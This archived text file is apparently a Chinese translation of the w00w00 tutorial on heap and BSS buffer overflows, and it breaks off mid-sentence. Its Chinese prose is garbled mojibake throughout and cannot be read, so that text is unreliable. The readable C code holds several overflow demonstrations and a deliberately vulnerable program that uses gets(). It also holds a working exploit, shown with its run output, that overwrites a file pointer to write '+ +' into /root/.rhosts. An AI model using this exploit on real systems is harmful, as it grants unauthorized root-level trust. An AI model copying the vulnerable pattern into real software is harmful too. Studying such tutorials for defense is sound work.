home *** CD-ROM | disk | FTP | other *** search
Text File | 2002-01-24 | 33.9 KB | 1,099 lines |
-
- Heap/BSS ╥τ│÷╗·└φ╖╓╬÷
-
- warning3<@hotmail.com>
- 1999.12
-
-
- [╟░╤╘ú║ ]
- [ ╒Γ╞¬╬─╒┬╓≈╥¬╩╟╗∙╙┌w00w00╖ó▒φ╡─: ]
- [ w00w00 on Heap Overflows ]
- [By: Matt Conover & w00w00 Security Team ]
- [-----------------------------------------------------------------------]
- [Copyright (C) January 1999, Matt Conover & w00w00 Security Development ]
- [ ╥▓▓╣│Σ┴╦╥╗╨⌐│╠╨≥║═╫╘╝║╡─╧δ╖¿. ]
- [ ╖╟│ú╕╨╨╗Matt Conover╕°╙Φ╡─╚╚╟Θ░∩╓·. ]
- [ (Thank Matt for his great work and help) ]
- [ ─π┐╔╥╘┤╙╧┬├µ╡─╡╪╓╖╗±╚í╘¡╬─: ]
- [ http://http://www.w00w00.org/articles.html ]
- [ ╙╔╙┌╩▒╝Σ╜╧╜⌠ú¼╩Φ┬⌐╓«┤ª─╤├Γú¼╚╬║╬╥Γ╝√║═╜¿╥Θ╟δ╖ó╕°warning3@hotmail.com ]
-
-
- ╦Σ╚╗╗∙╙┌Heap(╢╤)/BSS╡─╥τ│÷╧╓╘┌╩╟╧α╡▒╞╒▒Θ╡─ú¼╡½▓ó├╗╙╨╢α╔┘╜Θ╔▄╦ⁿ╡─╫╩┴╧íú
- ▒╛╬─╜½░∩─π└φ╜Γ╩▓├┤╩╟Heap╥τ│÷ú¼╥▓╜Θ╔▄┴╦╝╕╓╓│ú╙├╡─╣Ñ╗≈╖╜╖¿ú¼═¼╩▒╕°│÷┴╦╥╗╨⌐┐╔
- ─▄╡─╜Γ╛÷╖╜░╕íú╘─╢┴▒╛╬─ú¼─·╨Φ╥¬┴╦╜Γ╥╗╨⌐╗π▒αú¼C╙∩╤╘╥╘╝░╢╤╒╗╥τ│÷╡─╗∙▒╛╓¬╩╢íú
-
- ╥╗.╬¬╩▓├┤Heap/BSS╥τ│÷║▄╓╪╥¬ú┐
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- ╢╤╒╗╥τ│÷╡─╬╩╠Γ╥╤╛¡╣π╬¬╚╦╓¬ú¼╘╜└┤╘╜╢α╡─▓┘╫≈╧╡═│╔╠╝╥╘÷╝╙┴╦▓╗┐╔╓┤╨╨╢╤╒╗╡─▓╣
- ╢íú¼╥╗╨⌐╕÷╚╦╥▓╠ß╣⌐┴╦╫╘╝║╡─▓╣╢íú¼╧≤╓°├√╡─Solar Designer╠ß╣⌐╡─╒δ╢╘Linux╡─▓╗┐╔
- ╓┤╨╨╢╤╒╗╡─kernel patch(─┐╟░╥╤╛¡═╞│÷┴╦╙├╙┌2.2.13─┌║╦╡─patch)ú¼╥▓╙╨╥╗╨⌐╚╦┐¬╖ó
- ┴╦╥╗╨⌐▒α╥δ╞≈└┤╖└╓╣╢╤╒╗╥τ│÷ú¼╧≤Crispin Cowan╡╚┐¬╖ó╡─StackGuard╡╚╡╚íú╒Γ╨⌐╖╜╖¿
- ╢╝╥╗╢¿│╠╢╚╔╧┐╔╥╘╝⌡╔┘╙╔╢╤╒╗╥τ│÷╡╝╓┬╡─░▓╚½╬╩╠Γú¼╡½╩╟▓ó╚┤▓╗─▄╖└╓╣Heap/BSS╡─╥τ│÷íú
- ╘┌┤≤╢α╩²╡─▓┘╫≈╧╡═│╓╨ú¼Heap║═BSS╢╬╢╝╩╟┐╔╨┤┐╔╓┤╨╨╡─íú╒Γ╛═╩╣╡├Heap/BSS╡─╥τ│÷│╔
- ╬¬┐╔─▄íú
-
-
- ┤≤▓┐╖╓╡─╗∙╙┌heap╡─╥τ│÷╢╝╩╟▓╗╥└└╡╙┌╧╡═│║═╙▓╝■╜ß╣╣╡─ú¼╒Γ╜½╘┌║≤├µ╜°╥╗▓╜╜Θ╔▄íú
-
- ╢■.╥╗╨⌐╕┼─ε
- ~~~~~~~~~~~
-
- ╥╗╕÷┐╔╓┤╨╨╡─╬─╝■ú¿▒╚╚τ│ú╝√╡─ELF--Executable and Linking
- Format╕±╩╜╡─┐╔╓┤╨╨
- ╬─╝■)═¿│ú░ⁿ║¼╢α╕÷╢╬ú¼▒╚╚τú║PLT(╣²│╠┴¼╜╙▒φú⌐ú¼GOT(╚½╛╓╞½╥╞▒φú⌐,init(░ⁿ║¼╘┌│⌡╩╝╗»
- ╩▒╓┤╨╨╡─╓╕┴εú⌐ú¼fini(░ⁿ║¼│╠╨≥╓╒╓╣╩▒╥¬╓┤╨╨╡─╓╕┴εú⌐ú¼╥╘╝░ctors║═dtors(░ⁿ║¼╥╗╨⌐╚½
- ╛╓╣╣╘∞╓╕┴ε║═╬÷╣╣╓╕┴εú⌐
-
- ╦∙╬╜HEAPú¼╛═╩╟╙╔╙ª╙├│╠╨≥╢»╠¼╖╓┼Σ╡──┌┤µ╟°íú╘┌╒Γ└∩ú¼"╙╔╙ª╙├│╠╨≥"└┤╖╓┼Σ╩╟╓╡╡├╠╪▒≡╫ó
- ╥Γ╡─ú¼╥≥╬¬╘┌╥╗╕÷║├╡─▓┘╫≈╧╡═│╓╨ú¼┤≤▓┐╖╓╡──┌┤µ╟°╩╡╝╩╔╧╩╟╘┌─┌║╦╥╗╝╢▒╗╢»╠¼╖╓┼Σ╡─ú¼╢°
- Heap╢╬╘≥╩╟╙╔╙ª╙├│╠╨≥└┤╖╓┼Σ╡─íú╦ⁿ╘┌▒α╥δ╡─╩▒║≥▒╗│⌡╩╝╗»íú
- BSS╢╬░ⁿ║¼╬┤▒╗│⌡╩╝╗»╡─╩²╛▌ú¼╘┌│╠╨≥╘╦╨╨╡─╩▒║≥▓┼▒╗╖╓┼Σíú╘┌▒╗╨┤╚δ╩²╛▌╟░ú¼╦ⁿ╩╝╓╒▒ú│╓
- ╚½┴πú¿╓┴╔┘┤╙╙ª╙├│╠╨≥╡─╜╟╢╚┐┤╩╟╒Γ╤∙╡─ú⌐
-
- ╘┌┤≤▓┐╖╓╡─╧╡═│╓╨ú¼Heap╢╬╩╟╧≥╔╧╘÷│ñ╡─ú¿╧≥╕▀╓╖╖╜╧≥╘÷│ñú⌐íú╥≥┤╦ú¼╡▒╬╥├╟╦╡"X╘┌Y╡─
- ╧┬├µ"╩▒,╛═╩╟╓╕"X╡─╡╪╓╖╡═╙┌Y╡─╡╪╓╖"íú
-
-
- ╫ó╥Γú║╧┬├µ╠ß╡╜╡─"╗∙╙┌heap╡─╥τ│÷"╝╚░ⁿ║¼HEAP╢╬╡─╥τ│÷ú¼╥▓░ⁿ║¼BSS╢╬╡─╥τ│÷íú
-
- ╚².Heap/BSS╥τ│÷╣Ñ╗≈
-
-
- ╘┌╒Γ╥╗▓┐╖╓╓╨╬╥├╟╜½╜Θ╔▄╝╕╓╓▓╗═¼╡─└√╙├Heap/BSS╥τ│÷╡─╖╜╖¿íú┤≤▓┐╖╓╡─└²╫╙╢╝╩╟╒δ╢╘
- x86
- Unix╧╡═│╡─íú╫÷╥╗╨⌐╩╩╡▒╡─╕─▒Σú¼╥▓┐╔╥╘╙├╙┌DOS║═Windows╧╡═│íú╬╥├╟╥▓╜Θ╔▄┴╦╝╕╓╓╫¿
- ├┼╒δ╢╘DOS/Windows╡─╣Ñ╗≈╖╜╖¿íú
-
- ╫ó╥Γú║
-
- ╘┌▒╛╬─╓╨ú¼╬¬┴╦╝≥╡Ñ╞≡╝√ú¼╬╥├╟╩╣╙├┴╦╛½╚╖╡─╞½╥╞┴┐íú╞½╥╞┴┐▒╪╨δ╙δ╩╡╝╩╡─╓╡╧α╡╚ú¼╣Ñ
- ╗≈│╠╨≥▓┼─▄╣ñ╫≈íú╡▒╚╗─π╥▓┐╔╥╘╧≤═¿│ú╡─╢╤╒╗╣Ñ╗≈╖╜╖¿─╟╤∙ú¼═¿╣²╠ß╣⌐╢α╕÷╖╡╗╪╡╪╓╖╝░▓σ╚δ
- ┐╒╓╕┴ε╡╚╖╜╖¿╥╘╘÷╝╙│╔╣ª╡─╗·┬╩íú
-
- ╧┬├µ╡─╒Γ╕÷└²╫╙╩╟╕°─╟╨⌐▓╗╩∞╧ñHeap╥τ│÷╡─╚╦┐┤╡─ú¼╬╥╗ß╫÷╥╗╨⌐╝≥╡Ñ╡─╜Γ╩═ú║
- -----------------------------------------------------------------------------
- /* ╤▌╩╛╘┌heap╢╬(╥╤│⌡╩╝╗»╡─╩²╛▌)╖ó╔·╡─╢»╠¼╗║│σ╟°╥τ│÷ */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
-
- #define BUFSIZE 16
- #define OVERSIZE 8 /* ╬╥├╟╜½╕▓╕╟buf2╡─╟░OVERSIZE╕÷╫╓╜┌ */
-
- int main()
- {
- u_long diff;
- char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);
-
- diff = (u_long)buf2 - (u_long)buf1;
- printf("buf1 = %p, buf2 = %p, diff = 0x%x (%d)bytes\n", buf1, buf2,
- diff, diff);
-
- memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';/*
- ╜½buf2╙├'A'╠ε│Σ */
-
- printf("before overflow: buf2 = %s\n", buf2);
- memset(buf1, 'B', (u_int)(diff + OVERSIZE)); /*
- ╙├diff+OVERSIZE╕÷'B'╠ε│Σbuf1 */
- printf("after overflow: buf2 = %s\n", buf2);
-
- return 0;
- }
- -----------------------------------------------------------------------------
- ╡▒╬╥├╟╘╦╨╨╦ⁿ║≤ú¼╡├╡╜╧┬├µ╡─╜ß╣√ú║
- [warning3@testserver basic]$ ./heap1 8
- buf1 = 0x8049858, buf2 = 0x8049870, diff = 0x18 (24)bytes
- before overflow: buf2 = AAAAAAAAAAAAAAA
- after overflow: buf2 = BBBBBBBBAAAAAAA
-
- ╬╥├╟┐┤╡╜buf2╡─╟░8╕÷╫╓╜┌▒╗╕▓╕╟┴╦íú╒Γ╩╟╥≥╬¬═∙buf1╓╨╠ε╨┤╡─╩²╛▌│¼│÷┴╦╦ⁿ╡─▒▀╜τ╜°╚δ┴╦
- buf2╡─╖╢╬ºíú╙╔╙┌buf2╡─╩²╛▌╚╘╚╗╘┌╙╨╨º╡─heap╟°─┌ú¼│╠╨≥╚╘╚╗┐╔╥╘╒²│ú╜ß╩°íú┴φ═Γ╬╥├╟
- ┐╔╥╘╫ó╥Γ╡╜ú¼╦Σ╚╗buf1║═buf2╩╟╧α╝╠╖╓┼Σ╡─ú¼╡½╦√├╟▓ó▓╗╩╟╜⌠░ñ╫┼╡─ú¼╢°╩╟╙╨8╕÷╫╓╜┌╡─╝Σ
- ╛αú¼╒Γ╕÷╝Σ╛α┐╔─▄╦µ▓╗═¼╡─╧╡═│╗╖╛│╢°▓╗═¼íú
-
- buf1 ╝Σ╛α buf2
- ╕▓╕╟╟░:[xxxxxxxxxxxxxxxx][xxxxxxxx][AAAAAAAAAAAAAAA]
- ╡═╓╖ -----------------------------------> ╕▀╓╖
- ╕▓╕╟║≤:[BBBBBBBBBBBBBBBB][BBBBBBBB][BBBBBBBBAAAAAAA]
-
- ╫ó╥Γú║
-
- ╥╗╕÷╫Φ╓╣heap╥τ│÷╡─┐╔─▄╡─╖╜╖¿╛═╩╟╘┌heap╢╬╡─╦∙╙╨▒Σ┴┐╓«╝Σ╖┼╥╗╕÷"canary"╓╡(╛═╧≤
- StackGuard╓╨╦∙╫÷╡──╟╤∙ú⌐,╚⌠╒Γ╕÷╓╡╘┌╓┤╨╨╓╨▒╗╕─▒Σú¼╛═╚╧╬¬╖ó╔·┴╦╥τ│÷íú
-
- ╬¬┴╦╜Γ╩═BSS╢╬╡─╥τ│÷ú¼╬╥├╟└┤┐┤╧┬├µ╒Γ╕÷└²╫╙ú║
- -----------------------------------------------------------------------------
- /* ╤▌╩╛╘┌BSS╢╬(╬┤▒╗│⌡╩╝╗»╡─╩²╛▌)╡─╛▓╠¼╗║│σ╟°╥τ│÷ */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- #include <errno.h>
-
- #define ERROR -1
- #define BUFSIZE 16
-
- int main(int argc, char **argv)
- {
- u_long diff;
-
- int oversize;
- static char buf1[BUFSIZE], buf2[BUFSIZE];
-
- if (argc <= 1)
- {
- fprintf(stderr, "Usage: %s <numbytes>\n", argv[0]);
- fprintf(stderr, "[Will overflow static buffer by <numbytes>]\n");
-
- exit(ERROR);
- }
-
- diff = (u_long)buf2 - (u_long)buf1;
-
- printf("buf1 = %p, buf2 = %p, diff = 0x%x (%d) bytes\n\n",
- buf1, buf2, diff, diff);
-
- memset(buf2, 'A', BUFSIZE - 1), memset(buf1, 'B', BUFSIZE - 1);
- buf1[BUFSIZE - 1] = '\0', buf2[BUFSIZE - 1] = '\0';
-
- printf("before overflow: buf1 = %s, buf2 = %s\n", buf1, buf2);
-
- oversize = diff + atoi(argv[1]);
- memset(buf1, 'B', oversize);
-
- buf1[BUFSIZE - 1] = '\0', buf2[BUFSIZE - 1] = '\0';
- printf("after overflow: buf1 = %s, buf2 = %s\n\n", buf1, buf2);
-
- return 0;
- }
- -----------------------------------------------------------------------------
- ╡▒╬╥├╟╘╦╨╨╦ⁿ║≤ú¼╡├╡╜╧┬├µ╡─╜ß╣√ú║
- [warning3@testserver basic]$ ./heap2 8
- buf1 = 0x8049874, buf2 = 0x8049884, diff = 0x10 (16) bytes
-
- before overflow: buf1 = BBBBBBBBBBBBBBB, buf2 = AAAAAAAAAAAAAAA
- after overflow: buf1 = BBBBBBBBBBBBBBB, buf2 = BBBBBBBBAAAAAAA
-
- ║═heap╥τ│÷└α╦╞ú¼buf2╡─╟░8╕÷╫╓╜┌╥▓▒╗╕▓╕╟┴╦íú╬╥├╟╥▓┐╔╥╘╫ó╥Γ╡╜ú¼buf1║═buf2╩╟╜⌠░ñ╫┼
- ╡─ú¼╒Γ╥Γ╬╢╫┼╬╥├╟┐╔╥╘▓╗╙├▓┬▓Γbuf1║═buf2╓«╝Σ╡─╝Σ╛α.
-
- buf1 buf2
- ╕▓╕╟╟░:[BBBBBBBBBBBBBBBB][AAAAAAAAAAAAAAA]
- ╡═╓╖ ----------------------> ╕▀╓╖
- ╕▓╕╟║≤:[BBBBBBBBBBBBBBBB][BBBBBBBBAAAAAAA]
-
- ┤╙╔╧├µ┴╜╕÷╝≥╡Ñ╡─└²╫╙ú¼╬╥├╟┐╔╥╘╙ª╕├╥╤╛¡┴╦╜ΓHeap/BSS╥τ│÷╡─╗∙▒╛╖╜╩╜┴╦íú╬╥├╟─▄╙├╦ⁿ
- └┤╕▓╕╟╥╗╕÷╬─╝■├√ú¼┐┌┴ε╗≥╒▀╩╟▒ú┤µ╡─uid╡╚╡╚...
- ╧┬├µ╒Γ╕÷└²╫╙╤▌╩╛┴╦╥╗╕÷╓╕╒δ╩╟╚τ║╬▒╗╕▓╕╟╡─:
- -----------------------------------------------------------------------------
- /* ╤▌╩╛╘┌BSS╢╬(╬┤▒╗│⌡╩╝╗»╡─╩²╛▌)╓╨╡─╛▓╠¼╓╕╒δ╥τ│÷ */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- #include <errno.h>
-
- #define BUFSIZE 16
- #define ADDRLEN 4 /* ╓╕╒δ╡╪╓╖╡─│ñ╢╚ */
-
- int main()
- {
- u_long diff;
- static char buf[BUFSIZE], *bufptr;
-
- bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;
-
- printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
- &bufptr, bufptr, buf, diff, diff);
-
- memset(buf, 'A', (u_int)(diff + ADDRLEN));/*
- ╜½diff+ADDRLEN╫╓╜┌╡─'A'╠ε│Σ╡╜buf╓╨ */
-
- printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
- &bufptr, bufptr, buf, diff, diff);
-
- return 0;
- }
- -----------------------------------------------------------------------------
- ╡▒╬╥├╟╘╦╨╨╦ⁿ║≤ú¼╡├╡╜╧┬├µ╡─╜ß╣√ú║
- [warning3@testserver basic]$ ./heap3
- bufptr (0x8049640) = 0x8049630, buf = 0x8049630, diff = 0x10 (16) bytes
- bufptr (0x8049640) = 0x41414141, buf = 0x8049630, diff = 0x10 (16) bytes
-
- buf bufptr
- ╕▓╕╟╟░:[xxxxxxxxxxxxxxxx][0x08049630]
- ╡═╓╖ ------------------> ╕▀╓╖
- ╕▓╕╟║≤:[AAAAAAAAAAAAAAAA][0x41414141]
- [AAAA]
-
- ╬╥├╟┐╔╥╘║▄╟σ│■╡─┐┤╡╜ú¼╧╓╘┌╓╕╒δbufptr╧╓╘┌╓╕╧≥╥╗╕÷▓╗═¼╡─╡╪╓╖(0x41414141).
- ╚τ║╬└√╙├╒Γ╥╗╡π─╪ú┐└²╚τ╬╥├╟┐╔╥╘╓╪╨┤╥╗╕÷┴┘╩▒╬─╝■├√╡─╓╕╒δú¼╩╣╞Σ╓╕╧≥╥╗╕÷▓╗═¼╡─╫╓╖√
- ┤«(▒╚╚τ
- argv[1]╗≥╩╟╙╔╬╥├╟╠ß╣⌐╡──│╕÷╗╖╛│▒Σ┴┐),╦ⁿ┐╔╥╘░ⁿ║¼"/root/.rhosts"╗≥"/etc/
- passwd"....
-
-
- ╬¬┴╦╦╡├≈╒Γ╥╗╡πú¼╬╥├╟╘┘└┤┐┤╥╗╕÷└²╫╙íú╒Γ╕÷│╠╨≥╗ß╙├╥╗╕÷┴┘╩▒╬─╝■└┤┤ó┤µ╙├╗º╩Σ╚δ╡─
- ╩²╛▌íú
- -----------------------------------------------------------------------------
- /*
- * ╒Γ╩╟╥╗╕÷║▄╡Σ╨═╡─╙╨╚⌡╡π╡─│╠╨≥íú╦ⁿ╜½╙├╗º╡─╔ε╚δ┤ó┤µ╘┌╥╗╕÷┴┘╩▒╬─╝■╓╨íú
- *
- *
- * ▒α╥δ╖╜╖¿: gcc -o vulprog1 vulprog1.c
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- #include <errno.h>
-
- #define ERROR -1
- #define BUFSIZE 16
-
- /*
- * ╜½╣Ñ╗≈│╠╨≥╥╘root╔φ╖▌╘╦╨╨╗≥╒▀╕─▒Σ╣Ñ╗≈│╠╨≥╓╨"vulfile"╡─╓╡íú
- * ╖±╘≥ú¼╝┤╩╣╣Ñ╗≈│╠╨≥│╔╣ªú¼╦ⁿ╥▓▓╗╗ß╙╨╚¿╧▐╨▐╕─/root/.rhosts(╚▒╩í╡─└²╫╙)
- *
- */
-
- int main(int argc, char **argv)
- {
- FILE *tmpfd;
- static char buf[BUFSIZE], *tmpfile;
-
- if (argc <= 1)
- {
- fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
- exit(ERROR);
- }
-
- tmpfile = "/tmp/vulprog.tmp"; /* ╒Γ└∩╘▌╩▒▓╗┐╝┬╟┴┤╜╙╬╩╠Γ :) */
- printf("before: tmpfile = %s\n", tmpfile);
-
- printf("Enter one line of data to put in %s: ", tmpfile);
- gets(buf); /* ╡╝╓┬buf╥τ│÷ */
-
- printf("\nafter: tmpfile = %s\n", tmpfile);
-
- tmpfd = fopen(tmpfile, "w");
- if (tmpfd == NULL)
- {
- fprintf(stderr, "error opening %s: %s\n", tmpfile,
- strerror(errno));
-
- exit(ERROR);
- }
-
- fputs(buf, tmpfd); /* ╜½buf╠ß╣⌐╡─╩²╛▌┤µ╚δ┴┘╩▒╬─╝■ */
- fclose(tmpfd);
- }
-
- -----------------------------------------------------------------------------
- ╒Γ╕÷└²╫╙╓╨╡─╟Θ╨╬╘┌▒α│╠╩▒╩╟║▄╚▌╥╫╖ó╔·╡─ú¼║▄╢α╚╦╥╘╬¬╙├╛▓╠¼╩²╫Θ║═╛▓╠¼╓╕╒δ╛═╗ß▒╚╜╧
- ░▓╚½ú¼┐┤┴╦╧┬├µ╡─╣Ñ╗≈│╠╨≥ú¼╬╥╧δ─π╛═▓╗╗ß╒Γ├┤╧δ┴╦.:-)
- -----------------------------------------------------------------------------
- /*
- * Copyright (C) January 1999, Matt Conover & WSD
- *
- * ╒Γ╕÷│╠╨≥╜½╙├└┤╣Ñ╗≈vulprog1.c.╦ⁿ┤½╩Σ▓╬╩²╕°╙╨╚⌡╡π╡─│╠╨≥íú╙╨╚⌡╡π╡─│╠╨≥
- * ╥╘╬¬╜½╬╥├╟╩Σ╚δ╡─╥╗╨╨╩²╛▌┤ó┤µ╡╜┴╦╥╗╕÷┴┘╩▒╬─╝■└∩íú╚╗╢°ú¼╥≥╬¬╖ó╔·┴╦╛▓╠¼
- * ╗║│σ╟°╥τ│÷╡─╘╡╣╩ú¼╬╥├╟┐╔╥╘╨▐╕─╒Γ╕÷┴┘╩▒╬─╝■╡─╓╕╒δú¼╚├╦ⁿ╓╕╧≥argv[1](╬╥├╟
- *
- ╜½┤½╡▌"/root/.rhosts"╕°╦ⁿú⌐íú╚╗║≤│╠╨≥╛═╗ß╜½╬╥├╟╠ß╣⌐╡─╩Σ╚δ╩²╛▌┤µ╘┌"/root
- * /.rhosts"╓╨íú╦∙╥╘╬╥├╟╙├└┤╕▓╕╟╗║│σ╟°╡─╫╓╖√┤«╜½╗ß╩╟╧┬├µ╡─╕±╩╜ú║
- * [+ + # ][(tmpfile╡╪╓╖) - (buf ╡╪╓╖)╕÷╫╓╖√'A'][argv[1]╡─╡╪╓╖]
- *
- * "+ +"║≤├µ╕·╫┼'#'║┼╩╟╬¬┴╦╖└╓╣╬╥├╟╡─╥τ│÷┤·┬δ│÷╬╩╠Γíú├╗╙╨'#'(╫ó╩═╖√),╩╣╙├
- * .rhosts╡─│╠╨≥╛═╗ß┤φ╬≤╜Γ╩═╬╥├╟╡─╥τ│÷┤·┬δíú
- *
- * ▒α╥δ╖╜╖¿: gcc -o exploit1 exploit1.c
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
-
- #define BUFSIZE 256
-
- #define DIFF 16 /* vulprog╓╨buf║═tmpfile╓«╝Σ╡─╝Σ╛α */
-
- #define VULPROG "./vulprog1"
- #define VULFILE "/root/.rhosts" /* buf ╓╨╡──┌╚▌╜½▒╗┤ó┤µ╘┌╒Γ╕÷╬─╝■╓╨ */
-
- /* ╡├╡╜╡▒╟░╢╤╒╗╡─espú¼╙├└┤╝╞╦πargv[1]╡─╡╪╓╖ */
- u_long getesp()
- {
- __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
- }
-
- int main(int argc, char **argv)
- {
- u_long addr;
-
- register int i;
- int mainbufsize;
-
- char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";
-
- /* ------------------------------------------------------ */
- if (argc <= 1)
- {
- fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
- exit(ERROR);
- }
- /* ------------------------------------------------------ */
-
- memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# "); /*
- ╜½╣Ñ╗≈┤·┬δ╠ε╚δbuf */
-
- memset(buf + strlen(buf), 'A', DIFF); /* ╙├'A'╠ε┬·╩ú╙α╡─buf┐╒╝Σ */
- addr = getesp() + atoi(argv[1]); /* ╝╞╦πargv[1]╡─╡╪╓╖ */
-
- /* ╜½╡╪╓╖╖┤╨≥┼┼┴╨(╘┌╨íendian╧╡═│╓╨)║≤┤µ╚δbuf+DIFF┤ª */
- for (i = 0; i < sizeof(u_long); i++)
- buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);
- /* ╝╞╦πmainbuf╡─│ñ╢╚ */
- mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;
-
- mainbuf = (char *)malloc(mainbufsize);
- memset(mainbuf, 0, sizeof(mainbuf));
-
- snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
- buf, VULPROG, VULFILE);
-
- printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
- addr, VULFILE);
-
- system(mainbuf);
- return 0;
- }
-
- -----------------------------------------------------------------------------
-
- [root@testserver vulpkg1]# ./exploit1 349
- Overflowing tmpaddr to point to 0xbffffe6d, check /root/.rhosts after.
-
- before: tmpfile = /tmp/vulprog.tmp
- Enter one line of data to put in /tmp/vulprog.tmp:
- after: tmpfile = /vulprog1
-
- ╬╥├╟┐┤╡╜╧╓╘┌tmpfile╓╕╧≥argv[0]("./vulprog1"),
- ╬╥├╟╘÷╝╙10╕÷╫╓╜┌(argv[0]╡─│ñ╢╚):
-
- [root@testserver vulpkg1]# ./exploit1 359
- Overflowing tmpaddr to point to 0xbffffe77, check /root/.rhosts after.
-
- before: tmpfile = /tmp/vulprog.tmp
- Enter one line of data to put in /tmp/vulprog.tmp:
- after: tmpfile = /root/.rhosts
- [root@testserver vulpkg1]# cat /root/.rhosts
- + + # AAAAAAAAAAw?┐AA
-
- buf tmpfile
- ╕▓╕╟║≤ú║[+ +\t# AAAAAAAAAA][0x123445678]
-
- ╬╥├╟╥╤╛¡│╔╣ª╡─╜½"+ +"╠φ╝╙╡╜┴╦/root/.rhosts╓╨úí╣Ñ╗≈│╠╨≥╕▓╕╟┴╦vulprog╙├└┤╜╙╩▄
- gets()╩Σ╚δ╡─╛▓╠¼╗║│σ╟°ú¼▓ó╜½▓┬▓Γ╡─argv[1]╡─╡╪╓╖╕▓╕╟tmpfile.╬╥├╟┐╔╥╘╘┌mainbuf╓╨
- ╖┼╓├╚╬╥Γ│ñ╢╚╡─'A'╓▒╡╜╖ó╧╓╢α╔┘╕÷'A'▓┼─▄╡╜┤∩tmpfile╡─╡╪╓╖íú╚τ╣√─π╙╨╚⌡╡π│╠╨≥╘┤┬δ╡─
- ╗░ú¼┐╔╥╘╘÷╝╙"printf()"└┤╧╘╩╛│÷▒╗╕▓╕╟╡─╩²╛▌╙δ─┐▒Ω╩²╛▌╓«╝Σ╡─╛α└δú¿▒╚╚τú║
- 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').
-
- ╡½═¿│ú╒Γ╕÷╞½╥╞┴┐╘┌▒α╥δ╡─╩▒║≥╗ß╖ó╔·╕─▒Σú¼╡½╬╥├╟┐╔╥╘║▄╚▌╥╫╡─╓╪╨┬╝╞╦π/▓┬▓Γ╔⌡╓┴
- "▒⌐┴ª"▓┬▓Γ╒Γ╕÷╞½╥╞┴┐.
-
- ╫ó╥Γú║
-
- ╬╥├╟╨Φ╥¬╥╗╕÷╙╨╨º╡─╡╪╓╖(argv[1]╡─╡╪╓╖),╬╥├╟▒╪╨δ╜½╫╓╜┌╦│╨≥╖┤╧≥(╘┌little
- endian
- ╧╡═│╓╨).Little endian╧╡═│═¿│ú╩╟╡═╫╓╜┌╘┌╟░(x86╛═╩╟little endian╧╡═│).
- ╥≥┤╦0x12345678╘┌─┌┤µ╓╨╛═╩╟░┤0x78563412╡─╦│╨≥┤µ╖┼íú╚τ╣√╬╥├╟╩╟╘┌big
- endian╧╡═│
- ╓╨╫÷╒Γ╨⌐ú¿▒╚╚τsparc)ú¼╬╥├╟╛═▓╗▒╪╫÷╖┤╨≥╡─┤ª└φ┴╦íú
-
- ╞∙╜±╬¬╓╣ú¼╒Γ╨⌐└²╫╙╓╨├╗╙╨╥╗╕÷╥¬╟≤┐╔╓┤╨╨╡─heap!╒Γ╨⌐└²╫╙╢╝╩╟▓╗╥└└╡╧╡═│║═╙▓╝■
- ╜ß╣╣╡─(│²┴╦╫╓╜┌╖┤╨≥╡─▓┐╖╓)íú╒Γ╘┌╣Ñ╗≈heap╥τ│÷╩▒╩╟╖╟│ú╙╨╙├╡─íú
-
- ╓¬╡└┴╦╘⌡├┤╓╪╨┤╥╗╕÷╓╕╒δú¼╬╥├╟╜╙╧┬└┤┐┤┐┤╚τ║╬╨▐╕─╥╗╕÷║»╩²╓╕╒δíú╙δ╔╧├µ╡─└²╫╙▓╗═¼╡─╩╟ú¼
- ╨▐╕─║»╩²╓╕╒δ╡─╣Ñ╗≈╥¬╟≤╙╨╥╗╕÷┐╔╥╘╓┤╨╨╡─Heap
-
- ║»╩²╓╕╒δ(▒╚╚τ "int (*funcptr)(char
- *str)")╘╩╨φ│╠╨≥╘▒╢»╠¼╨▐╕─╥¬▒╗╡≈╙├╡─║»╩²íú╬╥├╟
- ┐╔╥╘╓╪╨┤║»╩²╓╕╒δ╡─╡╪╓╖ú¼╩╣╞Σ▒╗╓┤╨╨╡─╩▒║≥╫¬╚Ñ╡≈╙├╬╥├╟╓╕╢¿╡─║»╩²ú¿┤·┬δú⌐íú╬¬┴╦┤∩╡╜
- ╒Γ╕÷─┐╡─ú¼╬╥├╟╙╨╢α╓╓╤í╘±íú
-
- ╩╫╧╚ú¼╬╥├╟┐╔╥╘╩╣╙├╫╘╝║╡─shellcode,╬╥├╟┐╔╥╘╙├┴╜╓╓╖╜╖¿└┤╩╣╙├╬╥├╟╡─shellcodeú║
-
- 1. argv[]╖╜╖¿ ú║
- ╜½shellcode┤ó┤µ╘┌╥╗╕÷│╠╨≥▓╬╩²╓╨ú¿╒Γ╥¬╟≤╥╗╕÷┐╔╓┤╨╨╡─╢╤╒╗)
- 2. heap╞½╥╞╖╜╖¿ú║╜½shellcode┤ó┤µ╘┌┤╙heap╡─╢Ñ╢╦╡╜▒╗╕▓╕╟╡─╓╕╒δ╓«╝Σ╡─╟°╙≥╓╨
- ú¿╒Γ╥¬╟≤┐╔╓┤╨╨╡─heap)
-
- ╫ó╥Γú║
-
- heap┐╔╓┤╨╨╡─┐╔─▄╨╘▒╚╢╤╒╗┐╔╓┤╨╨╡─┐╔─▄╨╘╥¬┤≤╡├╢αíú╥≥┤╦ú¼└√╙├heap╡─╖╜╖¿┐╔─▄╕ⁿ
